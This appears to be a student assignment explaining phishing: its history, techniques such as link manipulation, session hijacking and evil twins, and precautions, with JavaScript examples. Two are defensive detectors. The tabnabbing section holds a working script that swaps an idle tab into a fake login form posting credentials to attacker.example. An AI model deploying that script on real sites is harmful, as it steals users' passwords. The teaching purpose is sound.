INTRODUCTION
Phishing is the practice of contacting a targeted individual by email, telephone or instant message while posing as a legitimate institution, in order to lure that individual into providing sensitive information such as banking details, credit card numbers and passwords. The stolen information is then used to access the individual's accounts and can result in identity theft and financial loss.
Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter their details at a fake website whose look and feel are almost identical to the legitimate one. It is a form of social engineering: it deceives the user rather than breaking the technology, and it exploits how hard current web security indicators are for ordinary users to interpret correctly.
HISTORY OF PHISHING
The first recorded use of the term "phishing" was on January 2, 1996, in the Usenet newsgroup alt.online-service.america-online. Although phishing scams originated around 1995, they did not become widely known to the public until nearly ten years later. A phishing technique had already been described in detail in a paper and presentation delivered to the 1987 International HP Users Group, Interex.
The earliest phishers used algorithms to generate plausible credit card numbers, which they used to open AOL accounts. Those accounts were then used to spam other users and for a range of other abuse. AOL put an end to this practice in 1995 by adding security measures that stopped randomly generated card numbers from being accepted.
With the card-number racket shut down, phishers created what would become a very common and enduring set of techniques. Through AOL Instant Messenger and email, they sent messages to users while posing as AOL employees, asking them to verify their accounts or to confirm their billing information.
THE EVOLUTION OF PHISHING
The basic pattern has not changed much since the AOL days.
In 2001, phishers turned their attention to online payment systems. The first such attack, against E-Gold in June 2001, was not considered successful, but it planted an important seed. In late 2003, phishers registered dozens of domains that resembled those of legitimate sites such as eBay and PayPal, and used email worms to send spoofed messages to PayPal customers. Those customers were led to the spoofed sites and asked to update their credit card details and other identifying information. By the beginning of 2004, phishers were riding a wave of success that included attacks on banking sites and their customers, with popup windows used to capture sensitive information from victims. Many more sophisticated methods have been developed since.
PHISHING TECHNIQUES
1) Email / Spam
Phishers may send the same email to millions of users, asking them to fill in personal details that are then used for fraud. This is a very common form of phishing. Most such messages carry an urgent note: the user must enter credentials to update account information, change details or verify the account before it is suspended. Sometimes the user is instead asked to fill out a form to access a new service through a link provided in the email. The manufactured urgency is the giveaway; a legitimate institution rarely demands credentials by return email.
2) Web Based Delivery
Web based delivery is one of the more sophisticated phishing techniques. Also described as a "man-in-the-middle" attack, it places the phisher's system between the user and the legitimate website. The phisher's system relays the user's requests to the real site and the real site's responses back to the user, so the transaction appears normal, while every value that passes through it, including login credentials and card details, is recorded by the phisher without the user's knowledge.
3) Instant Messaging
In instant messaging phishing, the user receives a message containing a link to a fake website with the same look and feel as the legitimate one. Unless the user checks the URL in the address bar, it can be hard to tell the fake and the legitimate site apart. The page then asks the user to provide personal information.
4) Trojan Hosts
A Trojan is malware installed on the victim's machine, usually disguised as or bundled with a legitimate program. It runs silently, collects credentials as the user types or stores them locally, and transmits what it captures to the phisher. The attacker never needs to lure the user to a fake site; the local machine does the collecting.
5) Link Manipulation
In link manipulation the phisher sends a link whose visible text or apparent destination differs from where it actually leads. When the user clicks the deceptive link, it opens the phisher's website instead of the site named in the link. Common tricks are link text that shows one URL while the underlying href points to another, a legitimate domain placed before an "@" so that the browser actually connects to the host after it, and lookalike hostnames that embed a well-known brand as a subdomain. One simple anti-phishing check is to hover the mouse over the link and read the real address in the status bar or tooltip; the caveat is that a page script can change the destination at click time, so the hover address is only reliable for plain links such as those in an email.
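As an added example (not code from the original page), here is a small JavaScript check that applies the hover-and-compare idea to every anchor in an email body. The brand list, the 203.0.113.5 address and the sample email are constructed for the demo; the three checks are the ones described above: userinfo before an "@", visible text that names a different host from the href, and a protected brand appearing in a subdomain position.

```javascript
// Added example (not from the original page): flag anchors whose visible
// text points somewhere other than the real href, the pattern behind link
// manipulation. Brand list and sample email are constructed for the demo.

const KNOWN_BRANDS = ['paypal.com', 'ebay.com']; // assumption: brands to protect

// Normalise a URL-like string (with or without scheme) to a lower-case hostname.
function hostOf(s) {
  const withScheme = /^[a-z][a-z0-9+.-]*:\/\//i.test(s) ? s : 'https://' + s;
  try {
    return new URL(withScheme).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// paypal.com and www.paypal.com count as the same site.
function sameSite(a, b) {
  return a === b || a.endsWith('.' + b) || b.endsWith('.' + a);
}

// Return a list of reasons the link looks deceptive (empty list = no finding).
function checkLink(href, visibleText) {
  const findings = [];
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return ['href is not a valid absolute URL'];
  }
  const host = url.hostname.toLowerCase();

  // 1. http://www.paypal.com@203.0.113.5/ : the part before '@' is userinfo;
  //    the browser connects to the host after it.
  if (url.username !== '') {
    findings.push(`userinfo "${url.username}" hides real host ${host}`);
  }

  // 2. Visible text that reads like a URL or domain must match the real host.
  const looksLikeUrl = /^(https?:\/\/)?[a-z0-9.-]+\.[a-z]{2,}(\/\S*)?$/i;
  const textHost = looksLikeUrl.test(visibleText.trim()) ? hostOf(visibleText.trim()) : null;
  if (textHost && !sameSite(textHost, host)) {
    findings.push(`text shows ${textHost} but link goes to ${host}`);
  }

  // 3. A protected brand's domain in a subdomain position,
  //    e.g. www.paypal.com.account-verify.example.
  for (const brand of KNOWN_BRANDS) {
    if (host !== brand && !host.endsWith('.' + brand) && host.includes(brand)) {
      findings.push(`host ${host} embeds brand ${brand} but is not under it`);
    }
  }
  return findings;
}

// Pull (href, visible text) pairs out of an HTML fragment such as an email body.
function extractAnchors(html) {
  const re = /<a\b[^>]*\bhref\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    out.push({ href: m[1], text: m[2].replace(/<[^>]+>/g, '').trim() });
  }
  return out;
}

// Constructed sample email body for the demo (203.0.113.5 is a documentation address).
const SAMPLE_EMAIL = `
<p>Your account is limited. Please verify at
<a href="http://203.0.113.5/verify">https://www.paypal.com/</a>.</p>
<p>Or use <a href="http://www.paypal.com@203.0.113.5/">www.paypal.com</a>.</p>
<p>Unsubscribe: <a href="https://www.paypal.com/unsub">click here</a></p>
`;

// Only the anchors that have at least one finding.
function scanEmail(html) {
  return extractAnchors(html)
    .map(a => ({ ...a, findings: checkLink(a.href, a.text) }))
    .filter(a => a.findings.length > 0);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const hit of scanEmail(SAMPLE_EMAIL)) {
    console.log(`${hit.href}  (shown as "${hit.text}")`);
    hit.findings.forEach(f => console.log('   - ' + f));
  }
}
```

On the sample email the first two links are flagged (host mismatch, and userinfo plus host mismatch) while the genuine unsubscribe link passes. The check is deliberately conservative: link text such as "click here" carries no host to compare against, so the hover check above is still needed for those.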
6) Key Loggers
Key loggers are malware that record keyboard input. The captured keystrokes are sent to the attacker, who extracts passwords and other information from them. To limit what key loggers can capture, some secure websites offer an on-screen virtual keyboard operated by mouse clicks. This defeats only keystroke capture: malware that takes screenshots or reads the submitted form data still sees the password, so a virtual keyboard is no substitute for keeping the machine clean and using a second authentication factor.
7) Session Hacking
In session hijacking, the phisher abuses the web session control mechanism to steal information from, or act as, the user. In the simplest form, session sniffing, the phisher uses a packet sniffer on a shared or unencrypted network to capture the session identifier (typically a cookie) that the web server uses to recognise a logged-in user, then replays it to access the server as that user without ever knowing the password. Serving the whole site over HTTPS and marking session cookies Secure and HttpOnly removes the plaintext exposure this attack depends on.
8) System Reconfiguration
Phishers may send a message asking the user to change settings on their computer. The message may come from a web address that resembles a trusted source. A typical target is the DNS configuration: if the user is talked into pointing the machine at the phisher's DNS servers, or adding entries to the hosts file, requests for the bank's real domain name silently resolve to the phisher's server.
9) Content Injection
Content injection is the technique in which the phisher alters part of the content of a legitimate website, for example through a cross-site scripting flaw or a compromised page. The injected content misleads the user into following a link to a page outside the legitimate site, where they are asked to enter personal information.
10) Phishing through Search Engines
Some phishing scams work through search engines: the user is directed to sites offering products or services at unusually low prices, and when the user enters credit card details to buy, the phishing site collects them. There are also many fake bank websites offering credit cards or loans at low rates which are nothing but phishing sites.
11) Phone Phishing
In phone phishing, also called vishing, the phisher calls the user and asks them to dial a number, or asks for bank account details directly over the phone. The call usually comes with a spoofed caller ID so that it appears to originate from the bank.
12) Malware Phishing
Phishing scams involving malware require the malware to run on the user's computer. It usually arrives as an attachment to the phisher's email, or behind a link to a downloadable file, and starts working as soon as the attachment is opened or the download is run.
Phishers take advantage of weaknesses in web security and in user habits to obtain sensitive information for fraudulent purposes. That is why it is always worth learning about the various phishing techniques, including those that use Trojans and spyware.
RECENT ADVANCEMENTS IN PHISHING
1) Tabnabbing
Tabnabbing is a phishing attack that persuades users to submit their login details to what appears to be a popular website by impersonating that site in a browser tab the user already has open. It takes advantage of user trust and inattention to tabs, and of the ability of a web page to rewrite its own title, favicon and contents long after it was loaded. A script on a page of average interest waits until the tab has been unattended for a while and then rewrites the page to impersonate a well-known site, such as a webmail login. A user who returns and sees a familiar login page may believe they were logged out and re-enter their username and password, which go to the phisher. The one thing the script cannot change is the address bar, which still shows the original page's URL.
A practical implementation of tabnabbing can be found at this webpage: http://isis.poly.edu/~eitan/tn-poc/goog.html
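The timing logic behind a tabnabbing page, as an added JavaScript example that is neither the linked proof of concept nor code from the original page. The idle threshold, the placeholder "Example Mail" page and the attacker.example URLs are assumptions for the demo. The state machine is kept separate from the DOM so the decision logic can be exercised outside a browser; installInBrowser wires it to the visibilitychange, blur and focus events a real page would use.

```javascript
// Added example (not the original page's code or the linked PoC): the decision
// logic of a tabnabbing page, separated from the DOM so it can run anywhere.
// idleMs, the "Example Mail" page and the attacker.example URLs are assumptions.

function createTabnabber({ idleMs = 5000, swap } = {}) {
  let hiddenAt = null;  // timestamp when the tab went to the background
  let swapped = false;  // the page has been rewritten (happens at most once)
  return {
    // Tab lost focus (visibilitychange -> hidden, or window blur).
    hidden(now) {
      if (hiddenAt === null) hiddenAt = now;
    },
    // User came back. A short absence is not enough; reset the clock.
    visible(now) {
      if (!swapped && hiddenAt !== null && now - hiddenAt < idleMs) hiddenAt = null;
    },
    // Periodic timer. Rewrite once the tab has been unattended for idleMs.
    // Returns true once the swap has happened.
    tick(now) {
      if (!swapped && hiddenAt !== null && now - hiddenAt >= idleMs) {
        swapped = true;
        swap();
      }
      return swapped;
    },
    get swapped() {
      return swapped;
    },
  };
}

// What the swap does in a browser: change title, favicon and body so the tab
// looks like a login page of the impersonated site. The URL bar is untouched.
function rewritePage() {
  document.title = 'Sign in - Example Mail';
  let icon = document.querySelector('link[rel~="icon"]');
  if (!icon) {
    icon = document.createElement('link');
    icon.rel = 'icon';
    document.head.appendChild(icon);
  }
  icon.href = 'https://attacker.example/examplemail-favicon.ico'; // assumption
  document.body.innerHTML =
    '<h1>Example Mail</h1><p>Your session expired. Please sign in again.</p>' +
    '<form action="https://attacker.example/collect" method="post">' + // assumption
    '<input name="user" placeholder="Email"> <input name="pass" type="password">' +
    '<button>Sign in</button></form>';
}

// Wire the state machine to the events a real page sees.
function installInBrowser(nabber, intervalMs = 1000) {
  document.addEventListener('visibilitychange', () => {
    if (document.hidden) nabber.hidden(Date.now());
    else nabber.visible(Date.now());
  });
  window.addEventListener('blur', () => nabber.hidden(Date.now()));
  window.addEventListener('focus', () => nabber.visible(Date.now()));
  const timer = setInterval(() => {
    if (nabber.tick(Date.now())) clearInterval(timer);
  }, intervalMs);
}

// Only runs when loaded in a browser; under Node the logic is exercised directly.
if (typeof document !== 'undefined') {
  installInBrowser(createTabnabber({ idleMs: 5000, swap: rewritePage }));
}
```

Nothing in this sequence touches the address bar, which is why the practical defence is to read the URL before typing a password into a tab you did not just open, and why a password manager that only fills credentials on the matching origin will stay silent on the rewritten page.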
2) Evil twin
An evil twin is a rogue Wi-Fi access point that appears to be the legitimate one offered on the premises but has actually been set up by an attacker to eavesdrop on wireless communications. The attacker tricks users into connecting their laptop or phone to the rogue hotspot by advertising the same network name as the legitimate provider, often with a stronger signal and no passphrase.
Wireless devices reach the Internet via nearby "hotspots" that they lock on to, and these hotspots can act as an open door for thieves: anyone with suitable equipment can locate a hotspot and take its place with their own "evil twin". Because the rogue access point controls the victim's network connection, the attacker can steal passwords either by snooping on unencrypted traffic passing through it or by phishing, redirecting the victim to a fraudulent website, such as a fake hotspot login page, and luring them into entering credentials there.
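An added example of how a laptop or a wireless intrusion detection system can spot an evil twin from a scan listing (example code, not from the original page). The scan lines, the CafeWiFi network, its MAC addresses and the allowlist of known access points are constructed for the demo; the listing format is a simplified one-column-per-field layout, with SSIDs assumed to contain no spaces.

```javascript
// Added example (not from the original page): spot a likely evil twin in a
// Wi-Fi scan. The scan lines are constructed; real tools (iw, airodump-ng,
// netsh wlan show networks) report the same fields in other layouts.

// Assumption: the operator knows the BSSIDs (MAC addresses) of the real APs.
const KNOWN_APS = {
  CafeWiFi: ['aa:bb:cc:00:01:01', 'aa:bb:cc:00:01:02'], // two legitimate radios
};

// Constructed scan: BSSID, SSID (no spaces), security mode, signal in dBm.
const SCAN = `
aa:bb:cc:00:01:01  CafeWiFi   WPA2-PSK  -52
aa:bb:cc:00:01:02  CafeWiFi   WPA2-PSK  -61
de:ad:be:ef:00:01  CafeWiFi   OPEN      -40
12:34:56:78:9a:bc  Neighbour  WPA2-PSK  -78
`;

function parseScan(text) {
  return text.trim().split('\n').map(line => {
    const [bssid, ssid, security, signal] = line.trim().split(/\s+/);
    return { bssid: bssid.toLowerCase(), ssid, security, signal: Number(signal) };
  });
}

// Returns one alert per suspicious BSSID, with the reasons it was flagged.
function findEvilTwins(networks, known = KNOWN_APS) {
  const alerts = [];
  const bySsid = new Map();
  for (const n of networks) {
    if (!bySsid.has(n.ssid)) bySsid.set(n.ssid, []);
    bySsid.get(n.ssid).push(n);
  }
  for (const [ssid, aps] of bySsid) {
    const securities = new Set(aps.map(a => a.security));
    for (const ap of aps) {
      const reasons = [];
      // Several BSSIDs per SSID is normal for multi-AP sites, so the allowlist
      // is what separates a legitimate extra radio from an impostor.
      if (ssid in known && !known[ssid].includes(ap.bssid)) {
        reasons.push('BSSID not in the list of known access points');
      }
      // Same SSID with a weaker security mode than its siblings: a rogue AP
      // often runs open so that victims connect without a passphrase.
      if (securities.size > 1 && ap.security === 'OPEN') {
        reasons.push('open network sharing an SSID with protected networks');
      }
      if (reasons.length) alerts.push({ ssid, bssid: ap.bssid, signal: ap.signal, reasons });
    }
  }
  return alerts;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const a of findEvilTwins(parseScan(SCAN))) {
    console.log(`${a.ssid} ${a.bssid} (${a.signal} dBm): ${a.reasons.join('; ')}`);
  }
}
```

On the constructed scan only de:ad:be:ef:00:01 is flagged, on both counts. An attacker who copies the real network's security mode would still be caught by the allowlist, which is why the allowlist matters more than the open-network heuristic; a strong signal from an unknown BSSID is a further hint worth reporting in a real deployment.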
PRECAUTIONARY MEASURES AGAINST PHISHING
Although complete prevention is virtually impossible, the precautionary measures below are steps that both consumers and corporations can take to reduce their chances of being conned by phishing scams.
1. Never Click on Hyperlinks within Emails
Hyperlinks within emails are often cloaked: the text you see as a hyperlink may not be where the hyperlink takes you. If you are unsure of the source of an email, do not click hyperlinks within it even when it appears to come from a legitimate company. Instead, type the URL directly into the browser's address bar, or call the company on a contact number previously verified or known to be genuine, never one given in the suspicious email itself.
2. Use Anti-Spam Filter Software
Some studies have put the share of all email that is spam at around 85%, a large part of it fraudulent. Dealing with it is costly and time consuming for end users. An effective spam filter reduces the number of fraudulent and malicious emails a consumer is ever exposed to, and with it the number of chances to be fooled.
3. Use Anti-Virus Software
To protect against Trojan and worm attacks, anti-virus software can detect and remove malicious files before they run. Such malware can search the computer for personally sensitive information and pass it to fraudsters, so it is important to keep the anti-virus software current with vendor updates, since it only recognises what it has signatures or heuristics for.
4. Use a Personal Firewall
A firewall can monitor both incoming and outgoing Internet traffic on a computer. This helps protect the computer from being broken into and having a virus planted, and it can also block unauthorised programs such as Trojans, worms and spyware from reaching the Internet, which cuts off the channel they use to send stolen data to the phisher.
5. Keep Software Updated (Operating Systems & Browsers)
Fraudsters and malicious hackers are continually finding vulnerabilities in operating systems and Internet browsers. Software vendors constantly release updates to fix these vulnerabilities; applying them promptly closes the holes that malware delivered by phishing relies on.
6. Always look for "https" and a padlock on a site that requests personal information
Information entered on a website over plain HTTP can be intercepted by a third party; HTTPS encrypts it in transit and protects against that. When submitting sensitive financial or personal information, look for the locked padlock in the browser and the "https://" at the start of the URL in the address bar. Note what this does and does not prove: the padlock means the connection is encrypted to whoever controls the domain shown in the address bar, not that the domain is the one you intended. Phishing sites routinely obtain valid certificates for their lookalike domains, so the padlock must be checked together with the domain name.
7. Keep your Computer Clean from Spyware
Spyware and adware are programs that can be installed on your computer without your consent and without you knowing they are there. They allow third parties to monitor your browsing patterns, see what you purchase and inundate you with popup ads, and the same capabilities let a phisher capture what you type into login pages.
8. Educate Yourself on Fraudulent Activity on the Internet
Internet fraud methods evolve at a rapid rate. Consumers need to be aware that they are vulnerable, because fraudsters are persuasive and convincing; many victims thought they were too smart to be scammed. Consumers should keep up with Internet fraud trends and the continual changes in the methods used.
This was my Data communication and Networking Assignment.